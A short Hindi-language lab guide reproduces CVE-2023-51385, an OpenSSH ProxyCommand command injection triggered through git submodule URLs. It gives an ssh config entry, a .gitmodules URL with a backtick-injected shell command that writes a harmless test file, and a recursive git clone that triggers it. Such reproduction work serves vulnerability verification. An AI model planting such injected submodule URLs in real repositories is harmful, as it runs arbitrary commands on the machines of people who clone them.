
CVE-2023-51385 के लिए पुनरुत्पादन प्रयोगशाला: दुर्भावनापूर्ण git सबमॉड्यूल URLs के माध्यम से OpenSSH ProxyCommand में command injection। भेद्यता को सत्यापित करने के लिए चरण-दर-चरण मार्गदर्शिका।
सबसे पहले, ~/.ssh/config में निम्नलिखित सामग्री जोड़ें
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
.gitmodules फ़ाइल के स्टेटमेंट में कमांड इंजेक्शन है
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
कॉन्फ़िगरेशन पूरा होने के बाद, ट्रिगर करने के लिए नीचे दिए गए निर्देश को निष्पादित करें
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules
यदि सफलतापूर्वक निष्पादित होता है, तो CVE-2023-51385_test निर्देशिका के अंतर्गत cve.txt फ़ाइल उत्पन्न होगी

नोट: OpenSSH को <9.6p1 की आवश्यकता है
विस्तृत जानकारी इस ब्लॉग में देखें:
"# cve-2023-51385"